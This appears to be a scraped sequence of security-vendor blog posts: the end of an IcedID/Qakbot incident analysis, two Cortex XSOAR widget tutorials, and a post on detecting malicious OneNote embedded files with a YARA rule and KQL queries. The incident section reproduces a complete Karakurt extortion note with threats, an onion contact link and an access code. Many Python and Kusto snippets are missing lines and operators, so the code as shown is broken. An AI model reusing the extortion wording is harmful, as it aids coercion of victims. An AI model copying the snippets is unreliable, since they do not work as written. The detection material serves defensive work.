Hostname ODSCHEDULING  [...] 12m work7---yshla v off
Hostname MDC1104 [...] 11m istok razobral

Ransom Notes

Another recovered artifact was a full ransom note where authors identified themselves as belonging to the Karakurt Team. While this note did not allow for the identification of its victim, it is further evidence of IcedID and Qakbot’s role within the access broker ecosystem.

Ok, you are reading this - so it means that we have your attention.
Here's the deal :
1. We breached your internal network and took control over all of your systems.
2. We analyzed and located each piece of more-or-less important files while spending weeks inside.
3. We exfiltrated anything we wanted (the total size of taken data exceeds 372 GB).

- Who the hell are you?
- The Karakurt Team. Pretty skilled hackers I guess.

- Our motivation is purely financial.

- We are going to report this to law enforcement.
- You surely can, but be ready that they will confiscate most of your IT infrastructure, and even if you will later change your mind and decide to pay - they will not let you.

- Who else already knows about the breach?
- Only You, who received the same message the same way. Nobody else. For now.

- What if I tell you that I do not care and going to ignore this incident.
- That's a very bad choice. If you will not contact us in a timely manner (by 07.01.2022) we will start notifying your employees, clients, partners, subcontractors and any other persons that should know how you treat your own corporate secrets and theirs.

- What if I will not contact you even after it?
- Than we shall move forward and start contacting your business competitors and list of anonymous inside traders we deal with, to find out if they are going to pay us for your data. When the list of the people who is interested in such data is formed - the closed online auction starts.

- None will buy what you took! I do not believe you!
- If the auction fails - we will just leak everything online, making sure that this leak goes straight to the press. We will make sure that your business will bleed by using any power we have in our posession, both social and technical.

- What happens if I pay?
- Nothing bad will happen.
We will remove everything we took from your network and leave you be.
We will provide the confirmation that the data is deleted.
We will help you to close technical vulnerabilities you have and provide some insight on how to avoid such incidents if some other perpetrator is interested in you.
We will never tell anybody about it.

- We understand. We are ready to move forward.
- You will find the Access Code at the end of this file, you will need this one to get in contact with us for further instructions

To contact us using this ID you should do the following :
1. Download Tor browser - and install it.
2. Open link in TOR browser - https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion
3. Insert Access Code 70fdca335aa3fd45a182f39b2592a5d0 inside the field on the page and click Enter.
4. The chat window will open and we will be able to communicate through a secured channel.

This link is available via "Tor Browser" only!

As a gesture of goodwill, we are ready to give you another leak - it is exclusive and fresh as well. Just let us know if you are interested in cooperation.

Key Takeaways

While it may not be complex to detect IcedID or Qakbot itself (any modern EDR should detect the rundll32.exe abuse), distinguishing which interactive actions were taken through a VNC backdoor does pose challenges. Focus is often put on command-based executions without considering what could otherwise be considered legitimate user processes such as web browsers or Outlook. Understanding how these backdoors operate improve responsive and forensic capabilities by, for example, allowing the identification and explanation of Edge processes with unlikely or unsupported flags.

This blog post further outlined the capability of network-level visibility which, for complex or BYOD (Bring Your Own Device) environments, may cope with the lack of endpoint visibility. Within this spirit, we would like to outline the effectiveness of the Snort IDS rules published by Networkforensic with regards to the detection of IcedID command & control communications.

If you are facing challenges keeping your environment clean or need help due to a compromise, do not hesitate to reach out; NVISO can help!

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified researcher within NVISO Labs. He spends most of his time performing defensive research and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – number widgets

Cortex XSOAR TipsTricks – Leveraging dynamic sections


Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC is data visualization, analysts can be swarmed with information, and finding out what piece of data is currently both relevant and significant can become hard. One of our tasks as SOAR engineers is to ease the decision process for analysts, we do so by providing additional contextual information about the incidents they handle, directly within the incident layout. In this objective, we incorporate number widgets into the analyst interface, these allow us to tell more visual stories about the security incidents we manage in XSOAR. From raw and sometimes unorganized data, they let us bring up eye-catching depictions of elements that can help in assessing the impact and veracity of a detection.


In this blogpost, we will focus on the use of number widgets.

We will show you how to make use of them for outputting information to the war room, incidents, indicators and dasbhoards. On top of that we will also cover how to add trends information and even how to integrate them into a dashboard with a dynamic query. In the previous post in the series, we looked at dynamic sections in Cortex XSOAR and how to leverage them to display text in a tree like way. If you are not familiar with Cortex XSOAR and dynamic sections, please read the previous post in the series.

We previously saw that we could use dynamic dections to display text, but there are a few other options available to us. These options are broken down here. In this post, we will:

  • Start with a simple example that runs a static query against Microsoft Sentinel and lets us display a single number widget.
  • Continue with extracting a second number from our query to populate the trend of the number we display.
  • Bring our widget to a dashboard
  • Make our dashboard widget read the date range selected by the user and modify the Sentinel query accordingly.

Let’s begin with a new automation and follow the instructions available in the number widget example of the PaloAlto documentation. When we run their example, we get the following result:

Figure 1: War Room output of the code example available in the Cortext XSOAR documentation

As expected, the example works out of the box. Let’s now go and make the widget display data from Microsoft Sentinel.

A static number from sentinel

To display data pulled from Microsoft Sentinel (Microsoft Azure’s cloud native SIEM), we first need to call an integration command. Here we use an instance of the Azure Log Analytics integration available in the Cortex XSOAR marketplace:

res = demisto.executeCommand(
	"azure-log-analytics-execute-query", {
		"query": THE_QUERY

We need a query to run, we will develop it on Sentinel before using it from Cortex XSOAR.

We will be looking at entries in SecurityIncident, a table that holds information about the security incidents present in your Sentinel deployment. We will query that table, and count the number of distinct incidents in a given month. The query we will use for that is the following:

| where TimeGenerated between (
| summarize count()
Figure 2: Screenshot of a Microsoft Sentinel query and it’s results: single value

Now that we know our query works, we will port it to Cortex XSOAR. We start by duplicating our previous automation and adding code to call the integration with the Sentinel query.

res = demisto.executeCommand("azure-log-analytics-execute-query", {
"query": """SecurityIncident
| where TimeGenerated between(
| summarize count()"""

We need to extract the count_ we could observe in the results of Sentinel, let’s inspect the res object returned to us by the integration.

Figure 3: Debug view in PyCharm

Upon inspection of the returned object, we identify that we can use the following logic to extract the count of incidents

counts = []

for result in results:
    if not (
        isinstance(result, dict)
        isinstance(contents := result.get("Contents"), list)
    for content in contents:
        if (
            isinstance(content, dict)
            isinstance(count := content.get("count_"), int)

total_count = sum(counts)

With the total_count obtained, we can simply change the hardcoded number from our previous widget and replace it with the value we just fetched:

        "Type": 17,
        "ContentsFormat": "number",
        "Contents": {
            "stats": total_count,
            "params": {
                "name": "Incidents Last Month",
                "colors": {
                    "items": {
                        "green": {
                            "value": 40

In the snippet above we use demisto.results(), this function let’s us write to the standard output that will be read by Cortex XSOAR. More possibilities for returning data from an automation are available in this documentation page: Python code conventions, returning data. Here we use the type 17 in the data we return, this is the type associated to widgets, the list of all defined types is available here.

Upon running our new automation, we get the exact same number previously obtained through Sentinel:

Figure 4: War room view of the widget outputted by the “Single value from Sentinel” code snippet

Adding a trend

We already have the number of alerts from last month pulled into XSOAR and displayed as a widget, let’s continue and also pull the count for the previous month. Our query to Sentinel now becomes:

| where TimeGenerated between (
| extend same = 1
| union (
    | where TimeGenerated between (
    | extend same = 2)
| summarize count() by same
Figure 5: Screenshot of a Microsoft Sentinel query and it’s results: two values

Correspondingly, our querying and extracting code becomes:

this_month_counts = list()
last_month_counts = list()

lookup = {
    1: this_month_counts,
    2: last_month_counts

for result in results:
    if not (
        isinstance(result, dict)
        isinstance(contents := result.get("Contents"), list)
    for content in contents:
        if not isinstance(content, dict):
        if not isinstance(raw_same_target := content.get("same"), int):
        same_target = lookup.get(raw_same_target)
        if (
            same_target is not None
            isinstance(count := content.get("count_"), int)

total_this_month_counts = sum(this_month_counts)
total_last_month_counts = sum(last_month_counts)

As for the data returned to Cortex XSOAR, the only change is on the stats key which now becomes:

"stats": {
	"prevSum": total_last_month_counts,
	"currSum": total_this_month_counts

The resulting widget looks as follows:

Figure 6: War room view of the widget outputted by the “Dual values from Sentinel” code snippet

Moving to incidents and indicators

Until now, we have been displaying our widgets in the war room, however we can also add them to incident and indicator layouts as well. As a reminder, the procedure to add General Purpose Dynamic sections to an incident can be found here: Add a Script to the incident Layout.

Our existing widgets are already compatible with incidents and indicators, after following the instructions above on how to add widgets to incidents, we can get the following layout tab. In a similar fashion after adding the dynamic-indicator-section tag to all three automations, you can also add them as widgets to an indicator layout:

Figure 7: Incident VS Indicator view of the three widgets

Moving to a dashboard

Rendering widgets in a dashboard is actually easier than in an incident layout, to verify this, let’s compare the methods to output a simple number widget, both for an incident and for a dashboard. For an incident, as we already saw earlier, you need to return the actual number, but it needs to be wrapped appropriately:

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": 53,
        "params": {
            "layout": "horizontal",
            "name": "Lala",
            "sign": "@",
            "colors": {
                "items": {
                    "#00CD33": {
                        "value": 10
                    "#FAC100": {
                        "value": 20
                    "green": {
                        "value": 40
            "type": "above"


In contrast, it is much easier for a dashboard:

result = 10

The difference here is that when building a dashboard, you can access the widget builder:

Figure 8: Dashboard widget editor view

Whereas from an incident, you need to explicitly return metadata defining the look and feel of your widget.

Therefore, if we want to make it possible for our automations to be used from a dashboard too, we need to adapt them to return either a simple value if being called from a dashboard, or a wrapped value if called from an incident or indicator.

Our first addition to the existing scripts will be to identify whether we’re being called from a dashboard, we will use the following snippet for this purpose.

is_dashboard = demisto.args().get("widgetType") is not None

This works because dashboards that have automation based widgets add a special argument when calling these automations. This special argument mentions the expected results type and can be found under the key widgetType, it’s presence is a good indication that your automation has been called from a dashboard.

We can now differentiate our outputted results depending on whether or not we are in a dashboard. For that, we separate our incident/indicator results in two, between the actual data and the wrapper. This snippet exposes the statement above applied to our first automation:

number = 53

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
      "stats": number,
if is_dashboard:

We do this with our three automations and also add the widget tag to them to make them selectable as source for automation-based dashboard widgets. Once added to a dashboard, our widgets look as follows:

Figure 9: Dashboard view of the three widgets

Getting timeframe data from the dashboard

At this point we are powering our widgets with data from Sentinel, but we are always looking at data from the same timeframe. Because dashboards have a time picker, we can instead start to use that data to determine the timeframe we are querying Sentinel for. Extraction of timeframe data from dashboards was covered in this previous blogpost.

We start by adding this line to our automation:

FromDate, ToDate = (

This gives us two NitroDates we can use to craft our Sentinel queries. In our second script which queries a single timeframe, the code becomes:

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
        to_ = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{from_}")')

if to_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{to_}")')

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| summarize count() by same"""

The logic we are modifying is the one describing how we craft our Kusto query (the query langage used in Microsoft Sentinel). We previously always had at our disposal a from_ and a to_ string representing the beginning and end of the timeframe we were interested in. With the selection dashboard date range selector, this is not the case anymore, we may get only a start date if the selector is on “3 days ago to now”, or only an end date if the selector is on “up to 3 days ago”. We must then change the logic we use to craft our query in a way that reflects this change. To accomodate this, we replace the between statement with >= and <= statements used to compare the TimeGenerated of an incident to the dates transmitted by the dashboard.

In a similar fashion, we modify the 3rd automation to calculate both the initial timeframe, and the previous timeframe from the dates passed down by the dashboard.

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

from_2 = "2022-09-01T00:00:00+00:00"
to_2 = "2022-10-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        if isinstance(ToDate, NitroRegularDate):
            td =
            td =
        delta = td -
        from2 = NitroRegularDate( - delta)
        to2 = FromDate
        from2 = FromDate
        to2 = ToDate

    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
        to_ = None
    if isinstance(from2, NitroRegularDate):
        from_2 = from2.to_iso8601()
        from_2 = None
    if isinstance(to2, NitroRegularDate):
        to_2 = to2.to_iso8601()
        to_2 = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f"TimeGenerated >= datetime(\"{from_}\")")

if to_ is not None:
    tmp_query_list.append(f"TimeGenerated < datetime(\"{to_}\")")

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| union (

tmp_query_list2 = list()

if from_2 is not None:
    tmp_query_list2.append(f"TimeGenerated >= datetime(\"{from_2}\")")

if to_2 is not None:
    tmp_query_list2.append(f"TimeGenerated < datetime(\"{to_2}\")")

if tmp_query_list2:
    query += "\n| where " + " and ".join(tmp_query_list2)

query += """
| extend same = 2)
| summarize count() by same"""

Our dashboard is now fully dynamic, with two widgets presenting data corresponding to the selected timeframe:

Figure 10: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Today”
Figure 11: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Last 7 days”

Looking back

We have covered the use of number widgets throughout Cortex XSOAR in pretty much every scenario, and have managed to make use of all the inputs available to us. Although the process used in this post was centered around number widgets, it should be noted that it can be applied to all other types of widgets.


Cortex XSOAR documentation: script based widget examples

Cortex XSOAR documentation: script based widget example 2

Microsoft Azure: Sentinel

Cortex XSOAR marketplace: Azure Log Analytics Integration

Cortex XSOAR documentation: Python code conventions

GIthub: Cortex XSOAR source – EntryTypes

Cortex XSOAR documentation: adding a script to an incident layout

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

OneNote Embedded file abuse

OneNote in the media

In recent weeks OneNote has gotten a lot of media attention as threat actors are abusing the embedded files feature in OneNote in their phishing campaigns.
I first observed this OneNote abuse in the media via Didier’s post. This was later also mentioned in Xavier’s ISC diary and on the podcast. Later, in the beginning of February, the hacker news covered this as well.

Attack technique

The OneNote feature that is being abused during these phishing campaigns is hiding embedded files behind pictures which entices the user to click the picture. If the picture is clicked, it will execute the file hidden beneath. These files could be executables, JavaScript files, HTML files, PowerShell, …. Basically any type of file that can execute malware when executed. Recently we have also observed the usage of .chm files which have an index.html file embedded that would run inline JavaScript.
On a Windows system this roughly translates to either one of the following processes executing the script/file: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'.

An image of a malicious embedded OneNote file
An image of a malicious embedded OneNote file

Anatomy of a OneNote file

Didier did amazing work in his blogpost where he described how a OneNote file looks like. What is interesting to us, is that OneNote files work with GUIDs to indicate the start of the embedded file section. The GUID that represents the start of an embedded file in OneNote is: {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} Using the following tool we can convert the GUID to a HEX string: e716e3bd65261145a4c48d4d0b7a9eac.
If a HEX editor is used, you can search for this string and find the exact location of the embedded file.
OneNote will then reserve 20 bytes. The first 8 bytes are used to indicate the length of the file, the following 4 bytes are unused and have to be zero, and the last 8 bytes being reserved and also zero. This results in the following HEX string E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 before the embedded file data beings.
When taking a look at the OneNote file through a HEX editor it becomes quickly clear that OneNote does not attempt to encrypt or compress anything. That is if you are looking at a .one file not a .onepkg. A .onepkg file acts similar as a ZIP file that contains the exported files from a OneNote Notebook. It is possible to open these files using 7zip.
The OneNote file (.one) will display the contents of the embedded file as followed:

A OneNote file in a HEX editor, that shows a plaintext embedded file

This means that we can easily check for known false positives while analyzing these files, which brings me to the next point, creating a detection rule.


It would not be easy to create a detection rule that catches all malicious embedded files as usually scripts do not have a “magic byte” unlike executables which have the famous “MZ” header. While it would be easy to create a YARA rule that looks as the previously observed hex string + the MZ file header, this would only flag embedded executables. If this is your goal then it is a great rule, however I would like something more flexible that I can use on an email gateway to flag all potential malicious incoming OneNote files.
So I took a different approach. I observed that it is common for pictures (e.g.: screenshots) to be embedded in a OneNote file. I did not observe many cases that had other files embedded. This led me to create a YARA rule that would look at a OneNote file, ignore the file sections that indicate that an image is present but would raise an alert when any other file was observed. So instead of looking for Malicious files, I will ignore known legitimate files. This simple trick allowed me to create a high confident detection rule while not overloading analysts with too many false positives.
Of course every environment is different and if it is common for PDF files to be embedded in OneNote files in your environment, you should exclude those PDF files as well. Therefore, it is important to establish a baseline during a testing period.
Below is an example of this technique. The 00‘s after the ?? can be replaced with ?? as well. Although these bytes should always be empty, this rule will not detect the files if the bytes were altered.

rule OneNote_EmbeddedFiles_NoPictures
        author = "Nicholas Dhaeyer - @DhaeyerWolf"
        date_created = "2023-02-14 - <3"
        date_last_modified = "2023-02-17"
        description = "OneNote files that contain embedded files that are not pictures."
        reference = ""

        $EmbeddedFileGUID =  { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC }
        $PNG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4E 47 0D 0A 1A 0A }
        $JPG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF D8 FF }
        $JPG20001 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 6A 50 20 20 0D 0A 87 0A }
        $JPG20002 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF 4F FF 51 }
        $BMP = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 42 4D }
        $GIF = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 47 49 46 }

        $EmbeddedFileGUID and (#EmbeddedFileGUID > #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF)

The latest version of this rule can be found on my GitHub

The logic behind the rule is as follows; The YARA rule will match any file that has the GUID which defines that an embedded file is present in the OneNote file. Then it will count the amount of GUIDs it has found. If this is more than the amount of GUIDs which are directly followed by an Image file (specified here as #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF) then it means that other files are present and the rule matches. If not, then the file only contains images and is assumed to be safe.
After a file is flagged, an analyst should still take a look at the embedded files. DissectMalware created an amazing python script that helps with the extraction of the embedded files. An analyst or automation system can analyze the file and provide more context if the extracted files are malicious or not.

At the time of writing this blogpost I ran my YARA rule on VirusTotal to see if there were any detections. I only looked back 3 weeks and found more than 4000 files that matched the rule. One of which is d2e6629f8bbca3663e1d76a06042bc1d459d81572936242c44ccc6cd896bfd5c and did not have any detections on VirusTotal at the time of writing. When this file is executed (in the screenshot seen as the one with the filename, Microsoft detected it as being a Qakbot dropper.

MDE blocking a malicious OneNote file infected with Qakbot

One observation That we have made is that a lot of these malicious OneNote files have an embedded file that is inserted from the Z:\builder\ directory. I suspect that this is where the malware builder tool creates the actual malicious file and then inserts it in the OneNote file. If this is the case, then this can be used to identify and link these files to the tool that is used.

I build a quick POC to parse these files which can be found on my GitHub. Additionally, I created a YARA rule on my GitHub that will look for OneNote files that contain these suspicious folder paths

Execution of a script through OneNote

As I was curious what would happen if a script would be executed in OneNote, I created a Proof Of Concept (POC), a small .bat script that would execute the whoami command.

Microsoft MDE Process execution of the embdedded file

As can be observed above, OneNote as the parent process will execute cmd.exe /c {OneNoteFilePath} where a temporary version of the script is stored and this will be executed.
When looking at File creation events, we also observe that this file is created on disk:

FileCreate event for the path: c:\Users\Hera\AppData\Temp\OneNote\16.0\Exported\{CCA4A94E-126B-489B-8B23-2B2C160D42AC}\NT\0\whoami.bat

As a detection rule, it could prove fruitful to detect OneNote spawning any of the lolbins commonly used for script execution such as the previously mentioned ones: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'. Additionally, looking for file creation or execution events under the path: C:\Users\Hera\AppData\Local\Temp\OneNote\16.0\Exported may give interesting results.

| where ProcessCommandLine matches regex @".*C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"
| where FolderPath matches regex @"C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"

Observations in production environments

At some point I was confused as I saw all these articles about this new way of delivering malware in the media. However, to this point I had not yet seen one infection or flagged email arrive in our SOC. So I did some digging and it turns out that Microsoft is pretty good at preventing this new way of malware delivery.
So let’s show some statistics:
Over a period of 30 days with one client we observed 255 emails that contain a OneNote file:

255 observed emails of the FileType: “one;onenote”

48 of these 255 are not flagged by Microsoft as malicious. The others have been flagged as malicious, meaning that more than 80% of the OneNote attachments are already known as malicious.

Microsoft detecting malicious emails with the filetype: “one;onenote”

When we actually look at what the impact is, we can see that from the 207 malicious emails, only one was delivered.

Evidence of one malicious email being delivered

Which leads me to conclude that at this moment Microsoft is very good at blocking these emails. My hypothesis is because OneNote embedded files are embedded in plain text and without obfuscation and defense evasion of the threat actor, they are very easy to catch with traditional ways of scanning files. Once this changes we might see more impacted cases being reported.


As threat actors are looking for new ways to deliver their malware, we need to be one step ahead to protect our data and users. And while Microsoft has already proven to detect and block these phishing emails, we need to take in consideration that not everyone is running a Microsoft product and that at some point threat actors will find a way to hide their malware better so that it is not as easily detected.
This blog post was meant to take you step by step through the process of creating a YARA detection rule that can help you prevent being compromised with one of these samples. What should be considered when creating a detection rule like this is that you will have to start from a baseline where you know which embedded files are commonly used within your environment. Although this YARA rule can be used in ‘block’ mode, where it will block every email that matches this rule, it is recommended to use this YARA rule in ‘Alert’ mode where an alert for the SOC team is created, and the email is held until analysis of the attachment is done, as this will minimize the impact of possible legitimate files being blocked.
Additionally, my goal of this blog post is to show that you don’t always have to think about flagging files as malicious. You can also do it the other way around and flag files as legitimate, ignore those and focus your attention on the files that have not been flagged. However, this does require a certain security maturity and takes more time to go through the flagged files.

About the Author

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Malware analysis, Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – text

Cortex XSOAR Tips Tricks – Leveraging dynamic


Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC (Security Operation Center) is data availability. As a SOC Analyst, doing a thorough analysis of a security incident requires having access to many pieces of information in order to acquire context on the events you are investigating. In a less mature SOC, this information is at best scattered in many tools, and at worst hardly available. This can be overcome by using multiple data sources to ingest contextual information into your Security Automation and Automated Response platform (SOAR). In turn, this allows you to provide a single pane of glass to the analysts which can then focus on meaningful work, and eliminate data collection from their daily tasks.


In this blogpost, we will focus on the use of dynamic sections to customize layouts in Cortex XSOAR. We will show that they can be used to display raw incident data for debugging purposes without cluttering the main workplace of our analysts.

A dynamic section is a layout element which you can add to a layout tab for either an incident or an indicator.
The fundamental difference between it and most other available layout elements is that it is not bound to displaying incident fields or fields of indicators related to the current incident on display, but instead is purely automation based.
This means that upon being rendered, a dynamic section executes an automation, and it is both the specific format and output of that automation that dictates the style and content that will be rendered.

This is not unlike the behavior of field display scripts, but these will be covered in a later post.

Real World Example

As part of our operations as an MSSP (Managed Security Services Provider), we are often faced with alert ingestion issues or mishaps.

One way these occur is that an alert will be fetched into Cortex XSOAR but some of it’s important features will not have been picked up by our extraction logic. This could materialize as missing fields in indicators or missing indicators all together. We may for example have received an alert for suspicious actions taken by a user, yet that very user was not added to the incident as an indicator, nor were details about these actions.

Incident Info tab of a Cortex XSOAR incident – the name of the incident points to unsanctioned cloud app usage by a user, but neither information about the user nor about the unsanctioned app was extracted.

This could happen in many different ways, most commonly that the exact data scheme used by the tool that generated the alert has changed. When this happens, the information we want to extract is present in the alert we fetch, it’s just not located where we’re used to find it. In such cases, a manual inspection of the raw data that came in is sufficient to identify where the data we want can be found. However, as shown in the next screenshot, manually inspecting the raw data of an incident is not that user friendly in Cortex XSOAR.

View of the “Context Data” of an Cortex XSOAR incident – the presentation of the available data is unsuitable for manual inspection

To make it easier, we built our own dynamic section, which displays curated data from both the labels and some entries of an incident. The result is as follows:

In this example, Azure Active Directory identifiers are available and can be leveraged to get the details of the involved user. In a similar manner, the Cloud Application Id is available.

Our dynamic section is powered by an automation that enumerates the labels of the current incident.

ret_labels = {}
incident = demisto.incident()
if not (isinstance(incident, dict) and "labels" in incident.keys()):
labels = incident["labels"]
if not isinstance(labels, (list, List)):
for label in labels:

Similarly, it also enumerates specifically tagged war room entries.

ret_notes = {}
investigation_id = demisto.incident()["id"]
uri = f"investigation/{investigation_id}"
body = {
	"pageSize": 100,
	"categories": [],
	"tags": ["raw_data"],
	"notCategories": [],
	"usersAndOperator": False,
	"tagsAndOperator": False,
body = json.dumps(body, indent=4)
args = {"uri": uri, "body": body}
res_cmd = demisto.executeCommand("demisto-api-post", args)
for res in res_cmd:
	if not (isinstance(res, dict) and isinstance(contents := res.get("Contents"), dict)):
	if not isinstance(response := contents.get("response"), dict):
	if not isinstance(entries := response.get("entries"), (list, List)):
	for entry in entries:

Once the incident labels are fetched, we extract their contents:

for label in labels:
	if not isinstance(label, dict):
	label_type, label_value = label.get("type"), label.get("value")
	if not (isinstance(label_type, str) and isinstance(label_value, str)):
		label_value = json.loads(label_value)
	except Exception:
		ret_labels.update({label_type: label_value})
	except Exception:

In a similar fashion, for each returned War Room entry, we extract the name of the parent playbook task and the content of the entry:

for entry in entries:
	key = ""
	if not isinstance(entry, dict):
	if isinstance(entry_id := entry.get("id"), str):
		key += entry_id
	if isinstance(entry_task := entry.get("entryTask"), dict):
		if isinstance(task_name := entry_task.get("taskName"), str):
			key += " - " + task_name
	value = None
	if isinstance(cnt := entry.get("contents"), str):
			value = json.loads(cnt)
		except Exception:
			value = cnt
	ret_notes.update({key: value})

To tie it all up, and because our goal is to offer a tree like navigable output, we structure our outputted data into a dictionary.

ret = {
	"notes": ret_notes,
	"labels": ret_labels

At that point, we cannot just output this dictionary as is, we need to encapsulate it in a way that will indicate to the layout that we want this layout element to be shown as a JSON tree.

results = CommandResults(raw_response = ret)

By now, our code is good to go and all we need to do is to edit our incident layout to add a new tab and create a new dynamic section powered by the automation we just built.

In Cortex XSOAR, navigate to Settings, Objects setup, Layouts, and either modify an existing layout or create your own. From there you can add a new General Purpose Dynamic Section.

Once your General Purpose Dynamic Section is added to your layout tab, you can edit it and choose the automation it executes. If your automation does not show up in the list of available ones, make sure you added the “dynamic-section” tag to it.

In this blog post, we have shown you how to display complex data in an incident layout which can be used by a security analyst to provide more context. In future posts, we will present more detailed context additions that tie in nicely with the Cortex XSOAR user interface.


Palo Alto Cortex XSOAR documentation: how to add a custom widget to the incident and indicator pages

Microsoft Sentinel Cloud Application Entity Identifiers

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Cortex XSOAR Tips & Tricks – Dealing with dates

Cortex XSOAR Tricks Dealing with dates


As an automation platform, Cortex XSOAR fetches data that represents events set at defined moments in time. That metadata is stored within Incidents, will be queried from various systems, and may undergo conversions as it is moves from machines to humans. With its various integrations, Cortex XSOAR ingests datetimes from sources that use different standards, yet manages to keep track of all of them.


In this blog post, we will go over dates in Cortex XSOAR, showing where they are presented and used, as well as how they are stored and passed around.
We will present a real world use case for extracting the dates being passed to the elements of a dashboard. With that in mind, we will go deeper onto the technicalities of passing timeframes to widgets and present an object oriented approach to interpreting and converting those, ensuring that this becomes an easy process, even when using third party tools.
The codebase for this post is available on the NVISO Github Repository.

Dates in XSOAR

Let’s look at the use of dates in Cortex XSOAR throughout the GUI and let’s pay attention to the formats we encounter:
Within incident layout tabs, incident fields of type “date” are formatted in a human readable way.

Occurence, Creation, and Last update dates in the Timeline Information GUI widget of an XSOAR Incident.

However in the raw context of an Incident, we see the same dates but stored in the ISO 8601 format:

Multiple datetime fields in the Context GUI of an XSOAR Incident

The dates we can observe in the raw context are formatted to be machine readable, this is what Integrations, Automations, and Playbooks read.

The dates visible in the layout tab are rendered live from those in the context. Cortex XSOAR adapts this view depending on the preferred timezone of the current user, which is saved in it’s user profile. This explains the 1 hour difference between the raw dates and their human readable counterparts in our examples above.

Moving on to the dashboards page, we get a time picker to selectively view Incident and Indicator data restricted to a given period of time. In the next part, we will find out how this time frame is passed down to the underlying code generating the tables and graphs that make up the dashboard. For that purpose, we will build a new dashboard comprised of a single automation based Widget.

Date Range Selector of a XSOAR Dashboard, set to display information from the “Last 7 Days”

The dashboard date picker

We just saw that Dashboards introduce a date picker element, it lets you select both relative timeframes such as “Last 7 days” and explicit timeframes where you define two precise dates in time. To find out how this is effectively passed down, we will use an automation based widget and dump the parameters provided to this automation.

If you need help on creating an automation, please refer to the XSOAR documentation on automations.

Let’s create an automation with the following code, not forgetting to add a ‘widget‘ tag to it.

import json

The snippet above will print the arguments passed down to the automation.

To run our automation and get it’s output, we need to create a new dashboard and add a text element to it, it’s content will be populated by our automation. For help on creating a dashboard and automation based widgets, please refer to XSOAR – add a widget to a dashboard and XSOAR – creating a widget automation.

We start our reversing effort by using the dashboard with an explicit timeframe:

Dashboard outpout with the date range “19 Apr 2022 – 22 Apr 2022”

